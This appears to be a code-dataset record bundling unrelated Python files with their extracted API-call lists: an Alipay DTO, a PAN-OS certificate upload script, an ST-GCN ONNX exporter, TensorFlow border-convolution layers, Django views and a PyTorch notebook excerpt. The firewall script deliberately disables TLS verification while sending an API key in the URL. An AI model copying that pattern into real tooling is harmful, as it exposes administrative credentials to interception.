                params[key] = value.to_alipay_dict() if hasattr(value, 'to_alipay_dict') else value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an instance from a response dict; returns None for empty input."""
        if not d:
            return None
        o = PaidOuterCardTemplateConfDTO()
        for key in ('cycle_selling_conf', 'manage_url_conf', 'open_selling_conf'):
            if key in d:
                # setattr goes through the property setters above
                setattr(o, key, d[key])
        return o
| [
"alipay.aop.api.domain.PaidOuterCardManageUrlConfDTO.PaidOuterCardManageUrlConfDTO.from_alipay_dict",
"alipay.aop.api.domain.PaidOuterCardSellingConfDTO.PaidOuterCardSellingConfDTO.from_alipay_dict",
"alipay.aop.api.domain.PaidOuterCardCycleSellConfDTO.PaidOuterCardCycleSellConfDTO.from_alipay_dict"
] | [((898, 951), 'alipay.aop.api.domain.PaidOuterCardCycleSellConfDTO.PaidOuterCardCycleSellConfDTO.from_alipay_dict', 'PaidOuterCardCycleSellConfDTO.from_alipay_dict', (['value'], {}), '(value)\n', (944, 951), False, 'from alipay.aop.api.domain.PaidOuterCardCycleSellConfDTO import PaidOuterCardCycleSellConfDTO\n'), ((1254, 1307), 'alipay.aop.api.domain.PaidOuterCardManageUrlConfDTO.PaidOuterCardManageUrlConfDTO.from_alipay_dict', 'PaidOuterCardManageUrlConfDTO.from_alipay_dict', (['value'], {}), '(value)\n', (1300, 1307), False, 'from alipay.aop.api.domain.PaidOuterCardManageUrlConfDTO import PaidOuterCardManageUrlConfDTO\n'), ((1620, 1671), 'alipay.aop.api.domain.PaidOuterCardSellingConfDTO.PaidOuterCardSellingConfDTO.from_alipay_dict', 'PaidOuterCardSellingConfDTO.from_alipay_dict', (['value'], {}), '(value)\n', (1664, 1671), False, 'from alipay.aop.api.domain.PaidOuterCardSellingConfDTO import PaidOuterCardSellingConfDTO\n')] |
import requests
import argparse
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# The PAN-OS management interface usually presents a self-signed cert,
# so TLS verification is disabled on purpose; silence the warning.
urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument("--TARGET_IP", help="IP address of the firewall", type=str)
parser.add_argument("--api_key", help="Firewall API Key", type=str)
parser.add_argument("--CERT_NAME", help="Certificate Label", type=str)
parser.add_argument("--CERT_FILE", help="Certificate File Name", type=str)
args = parser.parse_args()

target_ip = args.TARGET_IP
api_key = args.api_key
cert_name = args.CERT_NAME
cert_file = args.CERT_FILE

# Import the certificate via the PAN-OS XML API.
url = 'https://{}/api/?type=import&format=pem&category=certificate&certificate-name={}&key={}'.format(target_ip, cert_name, api_key)

# Open the certificate inside a context manager so the handle is closed
# even if the upload fails (the original version leaked the open file).
with open('../../working/' + cert_file, 'rb') as cert_fh:
    files = {'file': (cert_file, cert_fh, 'application/octet-string', {'Expires': '0'})}
    r = requests.post(url, files=files, verify=False)

print(r.text)
| [
"urllib3.disable_warnings",
"requests.post",
"argparse.ArgumentParser"
] | [((101, 149), 'urllib3.disable_warnings', 'urllib3.disable_warnings', (['InsecureRequestWarning'], {}), '(InsecureRequestWarning)\n', (125, 149), False, 'import urllib3\n'), ((161, 186), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (184, 186), False, 'import argparse\n'), ((871, 916), 'requests.post', 'requests.post', (['url'], {'files': 'files', 'verify': '(False)'}), '(url, files=files, verify=False)\n', (884, 916), False, 'import requests\n')] |
# ============================================================================
# Copyright 2018-2019 Open-MMLab. All rights reserved.
# Apache License
# Version 2.0, January 2004
# http://www.apache.org/licenses/
#
# TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import torch
from mmskeleton.utils import call_obj, load_checkpoint
def pt2onnx():
    """ST-GCN export script to convert pt model to ONNX model.
    Args:
        -ckpt: input checkpoint file path
        -onnx: output onnx file path
        -batch_size: define batch_size of the model
    Returns:
        Null. export onnx model with the input parameter -onnx
    """
    # define input parameter
    parser = argparse.ArgumentParser(
        description='ST-GCN Pytorch model convert to ONNX model')
    parser.add_argument('-ckpt',
                        default='./checkpoints/st_gcn.kinetics-6fa43f73.pth',
                        help='input checkpoint file path')
    parser.add_argument('-onnx',
                        default='./st-gcn_kinetics-skeleton_bs1.onnx',
                        help='output onnx file path')
    # bugfix: this was declared as a required *positional* argument
    # ('batch_size'), contradicting the documented '-batch_size' flag and
    # silently ignoring the default (argparse applies defaults to
    # positionals only with nargs='?').
    parser.add_argument('-batch_size', default=1,
                        help='define batch_size of the model')
    args = parser.parse_args()

    model_cfg = {'type': 'models.backbones.ST_GCN_18',
                 'in_channels': 3,
                 'num_class': 400,
                 'edge_importance_weighting': True,
                 'graph_cfg': {'layout': 'openpose', 'strategy': 'spatial'}}
    model = call_obj(**model_cfg)
    print("========= ST_GCN model ========")
    print(model)
    print("===============================")
    # bugfix: the parsed option is '-ckpt', so the attribute is args.ckpt;
    # the original args.checkpoint raised AttributeError at runtime.
    load_checkpoint(model, args.ckpt, map_location='cpu')
    model.eval()
    input_name = ["input1"]
    output_name = ["output1"]
    # dummy input shape (batch, 3, 300, 18, 2) -- presumably
    # (N, channels, frames, joints, persons); confirm against ST_GCN_18.
    dummy_input = torch.randn(int(args.batch_size), 3, 300, 18, 2, device='cpu')
    torch.onnx.export(model, dummy_input, args.onnx,
                      input_names=input_name, output_names=output_name)


if __name__ == "__main__":
    pt2onnx()
"mmskeleton.utils.call_obj",
"torch.onnx.export",
"argparse.ArgumentParser",
"mmskeleton.utils.load_checkpoint"
] | [((1785, 1871), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""ST-GCN Pytorch model convert to ONNX model"""'}), "(description=\n 'ST-GCN Pytorch model convert to ONNX model')\n", (1808, 1871), False, 'import argparse\n'), ((2535, 2556), 'mmskeleton.utils.call_obj', 'call_obj', ([], {}), '(**model_cfg)\n', (2543, 2556), False, 'from mmskeleton.utils import call_obj, load_checkpoint\n'), ((2668, 2727), 'mmskeleton.utils.load_checkpoint', 'load_checkpoint', (['model', 'args.checkpoint'], {'map_location': '"""cpu"""'}), "(model, args.checkpoint, map_location='cpu')\n", (2683, 2727), False, 'from mmskeleton.utils import call_obj, load_checkpoint\n'), ((2889, 2991), 'torch.onnx.export', 'torch.onnx.export', (['model', 'dummy_input', 'args.onnx'], {'input_names': 'input_name', 'output_names': 'output_name'}), '(model, dummy_input, args.onnx, input_names=input_name,\n output_names=output_name)\n', (2906, 2991), False, 'import torch\n')] |
# fits better in a StyleGAN or small network implementation, but provides a good
# proof of concept (especially for things like fashion MNIST)
import tensorflow as tf
from .utils import Conv2D as SpecializedConv2D
def nslice(rank, dim):
    """Build an indexer that slices axis *dim* of a rank-*rank* tensor.

    The returned callable accepts the same arguments as ``slice`` and
    produces a full indexing tuple: ``slice(None)`` on every axis except
    *dim*, which receives ``slice(*args)``.
    """
    before = tuple(slice(None) for _ in range(dim))
    after = tuple(slice(None) for _ in range(rank - dim - 1))

    def indexer(*args):
        return before + (slice(*args),) + after
    return indexer
class Dimension(tf.Module):
    """Border bookkeeping for one spatial axis of a "same"-padded, strided
    convolution.

    Tracks correction strips for the output positions whose kernel window
    hangs off the input (`start` / `end`), while the fully covered interior
    (`middle`) needs no correction.  Subclasses supply the algebra via
    `default` / `compose` / `overlap` / `reduce` / `conv` plus a
    zero-argument `initialize()` that seeds the raw per-position terms
    (see Reweight / Offset below).
    """
    def __init__(self, rank, primary, kernel, stride, size=None, channels=1,
                 channel_axis=None, disjoint=False, register=None, name=None):
        # rank: rank of the full tensor; primary: the axis this object owns
        name = name or f"axis{primary}"
        super().__init__(name=name)
        self.rank, self.primary, self.kernel = rank, primary, kernel
        self.stride, self.size, self.disjoint = stride, size, disjoint
        self.channels, self.channel_axis = channels, channel_axis
        # factory used to persist the border strips (tf.Variable by default)
        self.register = register or tf.Variable
        with self.name_scope:
            # calls the subclass' zero-argument initialize(), which in turn
            # calls Dimension.initialize(start, end) below
            self.initialize()
    def expand(self, tensor):
        # Reshape a 1-D strip so it broadcasts along `primary` of a
        # rank-`rank` tensor; replicate across channels when requested.
        shape = tf.ones((self.rank,), dtype=tf.int64)
        shape = tf.tensor_scatter_nd_update(shape, [[self.primary]], [-1])
        tensor = tf.reshape(tensor, shape)
        if self.channel_axis is not None:
            tensor = tf.repeat(tensor, self.channels, self.channel_axis)
        return tensor
    def group(self, tensor, start, prefix=False):
        # Fold runs of `stride` consecutive per-input terms into one
        # per-output term, padding with the subclass' neutral element so
        # the length divides evenly (pad goes in front when prefix=True).
        flip = slice(None, None, -1) if prefix else slice(None)
        tensor = tf.concat((tensor, self.default((self.stride - 1,)))[flip], 0)
        end = tf.size(tensor) - (tf.size(tensor) - start) % self.stride
        return self.reduce(tf.reshape(tensor[start:end], (-1, self.stride)), 1)
    def consolidate(self, middle, start, end, dim=None, rank=None):
        # Merge the strips when no uncorrected middle remains (middle <= 0);
        # a negative middle means the strips overlap and the overlapping
        # positions must be combined via the subclass' `overlap`.
        if middle > 0:
            return middle, start, end
        dim = self.primary if dim is None else dim
        rank = self.rank if rank is None else rank
        empty = tf.constant([], shape=[int(i != dim) for i in range(rank)])
        if middle == 0:
            return 0, empty, tf.concat((start, end), dim)
        idx = nslice(rank, dim)
        over = self.overlap(start[idx(middle, None)], end[idx(-middle)])
        return 0, empty, tf.concat(
            (start[idx(middle)], over, end[idx(-middle, None)]), dim)
    def pad(self, size):
        # For an input of length `size`, return (output length, offset into
        # the start strip, offset into the end strip) implied by "same"
        # padding with this kernel/stride.
        pad = tf.nn.relu(self.kernel - 1 - ((size - 1) % self.stride))
        start = (self.kernel - 1) // 2 - pad // 2
        end = (pad - 1) // 2 % self.stride
        return -(-size // self.stride), start, end
    def initialize(self, start, end):
        # Called by subclasses with the raw per-input-position strips.
        # When the axis size is fixed up front, fold the strips down to
        # per-output-position terms now; otherwise defer that to __call__.
        if self.size is not None:
            out, ss, es = self.pad(self.size)
            if self.disjoint:
                start, end = start[ss::self.stride], end[es::self.stride]
                start, end = start[:out], end[-out:]
            else:
                start, end = self.group(start, ss), self.group(end, es, True)
                if tf.size(end) > out:
                    # strip longer than the output: fold the excess into
                    # the outermost term
                    over = tf.size(end) - out + 1
                    end = tf.concat(([self.reduce(end[:over])], end[over:]), 0)
                if tf.size(start) > out:
                    edge = self.reduce(start[out - 1:])
                    start = tf.concat((start[:out - 1], [edge]), 0)
            self.middle = out - tf.size(start) - tf.size(end)
            if self.disjoint:
                self.middle, start, end = self.consolidate(
                    self.middle, start, end, 0, 1)
        self.start, self.end = self.expand(start), self.expand(end)
        # only persist non-empty strips through the register factory
        if tf.size(start) > 0:
            self.start = self.register(self.start, name="start")
        if tf.size(end) > 0:
            self.end = self.register(self.end, name="end")
    def __call__(self, size=None):
        # Return the (middle, start, end) triple for an input of length
        # `size` along this axis; `size` is required when it was not fixed
        # at construction time.
        if self.size is None:
            assert size is not None
            if self.disjoint:
                start, end = self.start, self.end
            else:
                # accumulate the raw per-position terms across each strip
                start = self.conv(self.start, True)
                end = self.conv(self.end, False)
            out, ss, es = self.pad(size)
            idx = nslice(self.rank, self.primary)
            start = start[idx(ss, None, self.stride)]
            end = end[idx(es, None, self.stride)]
            start, end = start[idx(out)], end[idx(-out, None)]
            return self.consolidate(out - tf.shape(start)[self.primary] -
                                    tf.shape(end)[self.primary], start, end)
        elif self.disjoint:
            return self.middle, self.start, self.end
        return self.consolidate(self.middle, self.conv(self.start, True),
                                self.conv(self.end, False))
class Reweight(Dimension):
    """Multiplicative border correction: combines per-position coverage
    ratios along one axis (neutral element 1, combined by product)."""

    def initialize(self):
        denom = tf.range((self.kernel + 1) // 2, self.kernel, dtype=tf.float32)
        if self.disjoint:
            ratios = tf.cast(self.kernel, tf.float32) / denom
        else:
            ratios = (denom + 1) / denom
        super().initialize(ratios[(self.kernel + 1) % 2:], ratios[::-1])

    def conv(self, x, reverse):
        # empty border strips pass through untouched
        if tf.size(x) == 0:
            return x
        return tf.math.cumprod(x, self.primary, reverse=reverse)

    @classmethod
    def default(cls, *args, **kw):
        # neutral element for multiplication
        return tf.ones(*args, **kw)

    @classmethod
    def compose(cls, a, b):
        return a * b

    @classmethod
    def overlap(cls, a, b):
        return a * b / (a + b - a * b)

    @classmethod
    def reduce(cls, *args, **kwargs):
        return tf.math.reduce_prod(*args, **kwargs)
class Offset(Dimension):
    """Additive border correction: zero-initialized per-position offsets
    along one axis (neutral element 0, combined by sum)."""

    def initialize(self):
        head = tf.zeros(((self.kernel - 1) // 2,))
        tail = tf.zeros((self.kernel // 2,))
        super().initialize(head, tail)

    def conv(self, x, reverse):
        # empty border strips pass through untouched
        if tf.size(x) == 0:
            return x
        return tf.math.cumsum(x, self.primary, reverse=reverse)

    @classmethod
    def default(cls, *args, **kw):
        # neutral element for addition
        return tf.zeros(*args, **kw)

    @classmethod
    def compose(cls, a, b):
        return a + b

    @classmethod
    def overlap(cls, a, b):
        return a + b

    @classmethod
    def reduce(cls, *args, **kwargs):
        return tf.math.reduce_sum(*args, **kwargs)
class Border(tf.Module):
    """Combine per-axis `Dimension` corrections (one `base` instance per
    spatial axis) into a single broadcastable correction tensor."""
    def __init__(self, rank, kernel, stride, size=None, empty=(), channels=1,
                 channel_axis=None, disjoint=False, register=None, name=None):
        # rank: rank of the full tensor (incl. batch/channel axes);
        # `empty` lists axes that get no correction (e.g. the batch axis).
        super().__init__(name=name)
        self.rank = rank
        size = (None,) * rank if size is None else size
        # normalize negative axis indices to positive ones
        empty = tuple(rank + i if i < 0 else i for i in empty)
        channel_axis = rank + channel_axis if channel_axis is not None \
            and channel_axis < 0 else channel_axis
        self.channels, self.channel_axis = channels, channel_axis
        # the axes that actually receive a correction
        ax = [i for i in range(rank) if i not in empty and i != channel_axis]
        with self.name_scope:
            self.ax = tuple(self.base(
                rank, dim, kernel[i], stride[i], size[dim], channels,
                channel_axis, disjoint, register) for i, dim in enumerate(ax))
    def __call__(self, size=None):
        """Build the full correction tensor for an input of shape `size`."""
        # query every axis for its (middle, start, end) triple
        ax = [ax(None if size is None else size[ax.primary]) for ax in self.ax]
        def build(idx=0, sides=(), expand=()):
            # Recursively combine the per-axis pieces: `sides` holds the
            # border strips chosen so far, `expand` the (axis, length)
            # middle spans to be tiled with the neutral element.
            if idx == len(self.ax):
                if not sides:
                    # pure-middle cell: filled with the neutral element
                    shape = [1] * self.rank
                    if self.channel_axis is not None:
                        shape[self.channel_axis] = self.channels
                    for i, val in expand:
                        shape[i] = val
                    return self.base.default(shape)
                res = sides[0]
                for side in sides[1:]:
                    res = self.base.compose(res, side)
                for axis, repeats in expand:
                    res = tf.repeat(res, repeats, axis)
                return res
            middle, start, end = ax[idx]
            if middle == 0:
                # consolidate() put everything into `end` in this case
                return build(idx + 1, sides + (end,), expand)
            else:
                dim = self.ax[idx].primary
                res = build(idx + 1, sides, expand + ((dim, middle),))
                res = res if tf.size(start) == 0 else tf.concat(
                    (build(idx + 1, sides + (start,), expand), res), dim)
                return res if tf.size(end) == 0 else tf.concat(
                    (res, build(idx + 1, sides + (end,), expand)), dim)
        return build()
class BorderReweight(Border):
    """Multiplicative border correction built from `Reweight` axes."""
    base = Reweight
class BorderOffset(Border):
    """Additive border correction built from `Offset` axes."""
    base = Offset
class BorderConv:
    """Mixin for keras conv layers: after the standard convolution, apply
    a multiplicative (and, with bias, additive) correction at positions
    where the kernel window overlaps the "same" padding.
    Requires padding="same" and a dilation_rate of all ones.
    """
    def __init__(self, *args, activation=None, disjoint=False, **kw):
        super().__init__(*args, **kw)
        # the correction math assumes "same" padding and no dilation
        assert self.padding == "same" and all(
            i == 1 for i in self.dilation_rate)
        self.disjoint = disjoint
        # 1x1 kernels never overlap the padding -> no correction needed
        self.small = bool(tf.reduce_all(self.kernel_size == tf.constant(1)))
        # activation is applied here, after the correction, so the wrapped
        # keras layer should be constructed with activation=None
        self._activation = tf.keras.activations.get(activation)
        if self._activation is None:
            self._activation = lambda x: x
    def build(self, input_shape):
        super().build(input_shape)
        if not self.small:
            # NOTE(review): relies on the private keras helper
            # _get_channel_axis(); may break across keras versions.
            channel_axis, zeroed = self._get_channel_axis(), (lambda _: 0.)
            # rank + 2 accounts for the batch and channel axes; axis 0
            # (batch) is excluded from correction via empty=(0,)
            self.border_weight = BorderReweight(
                self.rank + 2, self.kernel_size, self.strides, input_shape,
                (0,), self.filters, channel_axis, self.disjoint)
            # without a bias there is nothing additive to correct
            self.border_bias = zeroed if not self.use_bias else BorderOffset(
                self.rank + 2, self.kernel_size, self.strides, input_shape,
                (0,), self.filters, channel_axis, self.disjoint)
    def call(self, inputs):
        res = super().call(inputs)
        if not self.small:
            shape = tf.shape(inputs)
            # affine border correction: weight * conv(x) + bias
            res = self.border_weight(shape) * res + self.border_bias(shape)
        return self._activation(res)
class Conv1D(BorderConv, tf.keras.layers.Conv1D):
    """1-D convolution with border correction."""
    pass
class Conv2D(BorderConv, SpecializedConv2D):
    """2-D convolution with border correction (built on the specialized
    Conv2D from .utils)."""
    pass
class Conv3D(BorderConv, tf.keras.layers.Conv3D):
    """3-D convolution with border correction."""
    pass
class DepthwiseConv2D(BorderConv, tf.keras.layers.DepthwiseConv2D):
    """Depthwise 2-D convolution with border correction."""
    pass
| [
"tensorflow.math.reduce_prod",
"tensorflow.math.cumsum",
"tensorflow.keras.activations.get",
"tensorflow.shape",
"tensorflow.nn.relu",
"tensorflow.ones",
"tensorflow.math.cumprod",
"tensorflow.range",
"tensorflow.concat",
"tensorflow.tensor_scatter_nd_update",
"tensorflow.constant",
"tensorflo... | [((1055, 1092), 'tensorflow.ones', 'tf.ones', (['(self.rank,)'], {'dtype': 'tf.int64'}), '((self.rank,), dtype=tf.int64)\n', (1062, 1092), True, 'import tensorflow as tf\n'), ((1109, 1167), 'tensorflow.tensor_scatter_nd_update', 'tf.tensor_scatter_nd_update', (['shape', '[[self.primary]]', '[-1]'], {}), '(shape, [[self.primary]], [-1])\n', (1136, 1167), True, 'import tensorflow as tf\n'), ((1185, 1210), 'tensorflow.reshape', 'tf.reshape', (['tensor', 'shape'], {}), '(tensor, shape)\n', (1195, 1210), True, 'import tensorflow as tf\n'), ((2338, 2392), 'tensorflow.nn.relu', 'tf.nn.relu', (['(self.kernel - 1 - (size - 1) % self.stride)'], {}), '(self.kernel - 1 - (size - 1) % self.stride)\n', (2348, 2392), True, 'import tensorflow as tf\n'), ((4708, 4771), 'tensorflow.range', 'tf.range', (['((self.kernel + 1) // 2)', 'self.kernel'], {'dtype': 'tf.float32'}), '((self.kernel + 1) // 2, self.kernel, dtype=tf.float32)\n', (4716, 4771), True, 'import tensorflow as tf\n'), ((5042, 5091), 'tensorflow.math.cumprod', 'tf.math.cumprod', (['x', 'self.primary'], {'reverse': 'reverse'}), '(x, self.primary, reverse=reverse)\n', (5057, 5091), True, 'import tensorflow as tf\n'), ((5160, 5180), 'tensorflow.ones', 'tf.ones', (['*args'], {}), '(*args, **kw)\n', (5167, 5180), True, 'import tensorflow as tf\n'), ((5404, 5440), 'tensorflow.math.reduce_prod', 'tf.math.reduce_prod', (['*args'], {}), '(*args, **kwargs)\n', (5423, 5440), True, 'import tensorflow as tf\n'), ((5509, 5544), 'tensorflow.zeros', 'tf.zeros', (['((self.kernel - 1) // 2,)'], {}), '(((self.kernel - 1) // 2,))\n', (5517, 5544), True, 'import tensorflow as tf\n'), ((5559, 5588), 'tensorflow.zeros', 'tf.zeros', (['(self.kernel // 2,)'], {}), '((self.kernel // 2,))\n', (5567, 5588), True, 'import tensorflow as tf\n'), ((5726, 5774), 'tensorflow.math.cumsum', 'tf.math.cumsum', (['x', 'self.primary'], {'reverse': 'reverse'}), '(x, self.primary, reverse=reverse)\n', (5740, 5774), True, 'import tensorflow as 
tf\n'), ((5843, 5864), 'tensorflow.zeros', 'tf.zeros', (['*args'], {}), '(*args, **kw)\n', (5851, 5864), True, 'import tensorflow as tf\n'), ((6070, 6105), 'tensorflow.math.reduce_sum', 'tf.math.reduce_sum', (['*args'], {}), '(*args, **kwargs)\n', (6088, 6105), True, 'import tensorflow as tf\n'), ((8753, 8789), 'tensorflow.keras.activations.get', 'tf.keras.activations.get', (['activation'], {}), '(activation)\n', (8777, 8789), True, 'import tensorflow as tf\n'), ((1274, 1325), 'tensorflow.repeat', 'tf.repeat', (['tensor', 'self.channels', 'self.channel_axis'], {}), '(tensor, self.channels, self.channel_axis)\n', (1283, 1325), True, 'import tensorflow as tf\n'), ((1557, 1572), 'tensorflow.size', 'tf.size', (['tensor'], {}), '(tensor)\n', (1564, 1572), True, 'import tensorflow as tf\n'), ((1642, 1690), 'tensorflow.reshape', 'tf.reshape', (['tensor[start:end]', '(-1, self.stride)'], {}), '(tensor[start:end], (-1, self.stride))\n', (1652, 1690), True, 'import tensorflow as tf\n'), ((3541, 3555), 'tensorflow.size', 'tf.size', (['start'], {}), '(start)\n', (3548, 3555), True, 'import tensorflow as tf\n'), ((3637, 3649), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (3644, 3649), True, 'import tensorflow as tf\n'), ((4988, 4998), 'tensorflow.size', 'tf.size', (['x'], {}), '(x)\n', (4995, 4998), True, 'import tensorflow as tf\n'), ((5672, 5682), 'tensorflow.size', 'tf.size', (['x'], {}), '(x)\n', (5679, 5682), True, 'import tensorflow as tf\n'), ((9563, 9579), 'tensorflow.shape', 'tf.shape', (['inputs'], {}), '(inputs)\n', (9571, 9579), True, 'import tensorflow as tf\n'), ((2057, 2085), 'tensorflow.concat', 'tf.concat', (['(start, end)', 'dim'], {}), '((start, end), dim)\n', (2066, 2085), True, 'import tensorflow as tf\n'), ((3307, 3319), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (3314, 3319), True, 'import tensorflow as tf\n'), ((4786, 4818), 'tensorflow.cast', 'tf.cast', (['self.kernel', 'tf.float32'], {}), '(self.kernel, tf.float32)\n', (4793, 
4818), True, 'import tensorflow as tf\n'), ((1576, 1591), 'tensorflow.size', 'tf.size', (['tensor'], {}), '(tensor)\n', (1583, 1591), True, 'import tensorflow as tf\n'), ((2930, 2942), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (2937, 2942), True, 'import tensorflow as tf\n'), ((3290, 3304), 'tensorflow.size', 'tf.size', (['start'], {}), '(start)\n', (3297, 3304), True, 'import tensorflow as tf\n'), ((7677, 7706), 'tensorflow.repeat', 'tf.repeat', (['res', 'repeats', 'axis'], {}), '(res, repeats, axis)\n', (7686, 7706), True, 'import tensorflow as tf\n'), ((8709, 8723), 'tensorflow.constant', 'tf.constant', (['(1)'], {}), '(1)\n', (8720, 8723), True, 'import tensorflow as tf\n'), ((3103, 3117), 'tensorflow.size', 'tf.size', (['start'], {}), '(start)\n', (3110, 3117), True, 'import tensorflow as tf\n'), ((3217, 3256), 'tensorflow.concat', 'tf.concat', (['(start[:out - 1], [edge])', '(0)'], {}), '((start[:out - 1], [edge]), 0)\n', (3226, 3256), True, 'import tensorflow as tf\n'), ((4384, 4397), 'tensorflow.shape', 'tf.shape', (['end'], {}), '(end)\n', (4392, 4397), True, 'import tensorflow as tf\n'), ((8027, 8041), 'tensorflow.size', 'tf.size', (['start'], {}), '(start)\n', (8034, 8041), True, 'import tensorflow as tf\n'), ((8167, 8179), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (8174, 8179), True, 'import tensorflow as tf\n'), ((2977, 2989), 'tensorflow.size', 'tf.size', (['end'], {}), '(end)\n', (2984, 2989), True, 'import tensorflow as tf\n'), ((4316, 4331), 'tensorflow.shape', 'tf.shape', (['start'], {}), '(start)\n', (4324, 4331), True, 'import tensorflow as tf\n')] |
from django.shortcuts import render, redirect
from django.urls import reverse
from django.views.generic import ListView
from django.views.generic.detail import DetailView
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from .models import Post
from .forms import PostForm
class PostListView(ListView):
    """Public listing of posts, excluding those still awaiting moderation."""
    model = Post
    template_name = 'post/list_post.html'

    def get_queryset(self):
        # status 1 == "on review" — keep unreviewed posts off the list
        visible = Post.objects.filter(~Q(status=1))
        return visible
class PostDetailView(DetailView):
    """Detail page for a single post, resolved by its slug."""
    model = Post
    slug_field = 'slug'
    slug_url_kwarg = 'the_slug'
    template_name = 'post/show_post.html'
@login_required
def post_new(request):
    """Create a new post.

    Moderators and admins get their post auto-approved (status 2) and are
    redirected straight to its detail page; other users' posts keep the
    default "on review" status and the author is sent to their posts page.
    Invalid submissions re-render the form with its errors.
    """
    if request.method == "POST":
        form = PostForm(request.POST)
        if form.is_valid():
            post = form.save(commit=False)
            post.author = request.user
            # Moderator/admin posts skip the review queue entirely.
            if request.user.groups.filter(name__in=['moderator', 'admin']).exists():
                post.status = 2  # Approved
                post.save()
                return HttpResponseRedirect(
                    reverse('post:post_detail_view', args=[post.slug])
                )
            # Regular users: save with the default "on review" status.
            post.save()
            return HttpResponseRedirect(
                reverse('post:post_user')
            )
    else:
        form = PostForm()
    # Reached on GET (empty form) or invalid POST (bound form with errors).
    return render(request, 'post/new_post.html', {'form': form})
def post_user(request):
    """Render the current user's posts page."""
    template = 'post/user_post.html'
    return render(request, template)
# Login-protected view callables exported for use in the URLconf.
post_list_view = login_required(PostListView.as_view())
post_detail_view = login_required(PostDetailView.as_view())
| [
"django.shortcuts.render",
"django.db.models.Q",
"django.urls.reverse"
] | [((1402, 1455), 'django.shortcuts.render', 'render', (['request', '"""post/new_post.html"""', "{'form': form}"], {}), "(request, 'post/new_post.html', {'form': form})\n", (1408, 1455), False, 'from django.shortcuts import render, redirect\n'), ((1493, 1531), 'django.shortcuts.render', 'render', (['request', '"""post/user_post.html"""'], {}), "(request, 'post/user_post.html')\n", (1499, 1531), False, 'from django.shortcuts import render, redirect\n'), ((519, 530), 'django.db.models.Q', 'Q', ([], {'status': '(1)'}), '(status=1)\n', (520, 530), False, 'from django.db.models import Q\n'), ((1315, 1340), 'django.urls.reverse', 'reverse', (['"""post:post_user"""'], {}), "('post:post_user')\n", (1322, 1340), False, 'from django.urls import reverse\n'), ((1165, 1215), 'django.urls.reverse', 'reverse', (['"""post:post_detail_view"""'], {'args': '[post.slug]'}), "('post:post_detail_view', args=[post.slug])\n", (1172, 1215), False, 'from django.urls import reverse\n')] |
#!/usr/bin/env python
# coding: utf-8
# # Developing an AI application
#
# Going forward, AI algorithms will be incorporated into more and more everyday applications. For example, you might want to include an image classifier in a smart phone app. To do this, you'd use a deep learning model trained on hundreds of thousands of images as part of the overall application architecture. A large part of software development in the future will be using these types of models as common parts of applications.
#
# In this project, you'll train an image classifier to recognize different species of flowers. You can imagine using something like this in a phone app that tells you the name of the flower your camera is looking at. In practice you'd train this classifier, then export it for use in your application. We'll be using [this dataset](http://www.robots.ox.ac.uk/~vgg/data/flowers/102/index.html) of 102 flower categories, you can see a few examples below.
#
# <img src='assets/Flowers.png' width=500px>
#
# The project is broken down into multiple steps:
#
# * Load and preprocess the image dataset
# * Train the image classifier on your dataset
# * Use the trained classifier to predict image content
#
# We'll lead you through each part which you'll implement in Python.
#
# When you've completed this project, you'll have an application that can be trained on any set of labeled images. Here your network will be learning about flowers and end up as a command line application. But, what you do with your new skills depends on your imagination and effort in building a dataset. For example, imagine an app where you take a picture of a car, it tells you what the make and model is, then looks up information about it. Go build your own dataset and make something new.
#
# First up is importing the packages you'll need. It's good practice to keep all the imports at the beginning of your code. As you work through this notebook and find you need to import a package, make sure to add the import up here.
# In[17]:
# Imports here
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import optim
from torchvision import datasets,transforms,models
import numpy as np
# ## Load the data
#
# Here you'll use `torchvision` to load the data ([documentation](http://pytorch.org/docs/0.3.0/torchvision/index.html)). The data should be included alongside this notebook, otherwise you can [download it here](https://s3.amazonaws.com/content.udacity-data.com/nd089/flower_data.tar.gz). The dataset is split into three parts, training, validation, and testing. For the training, you'll want to apply transformations such as random scaling, cropping, and flipping. This will help the network generalize leading to better performance. You'll also need to make sure the input data is resized to 224x224 pixels as required by the pre-trained networks.
#
# The validation and testing sets are used to measure the model's performance on data it hasn't seen yet. For this you don't want any scaling or rotation transformations, but you'll need to resize then crop the images to the appropriate size.
#
# The pre-trained networks you'll use were trained on the ImageNet dataset where each color channel was normalized separately. For all three sets you'll need to normalize the means and standard deviations of the images to what the network expects. For the means, it's `[0.485, 0.456, 0.406]` and for the standard deviations `[0.229, 0.224, 0.225]`, calculated from the ImageNet images. These values will shift each color channel to be centered at 0 and range from -1 to 1.
#
# In[2]:
# Directory layout expected by torchvision's ImageFolder loader.
data_dir = 'flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# In[3]:
# TODO: Define your transforms for the training, validation, and testing sets
# Training: random rotation/crop/flip augmentations, then the ImageNet
# normalization the pre-trained network expects.
train_transforms = transforms.Compose([transforms.RandomRotation(30),
                                       transforms.RandomResizedCrop(224),
                                       transforms.RandomHorizontalFlip(),
                                       transforms.ToTensor(),
                                       transforms.Normalize([0.485, 0.456, 0.406],
                                                            [0.229, 0.224, 0.225])])
# Evaluation: deterministic resize + center crop, same normalization.
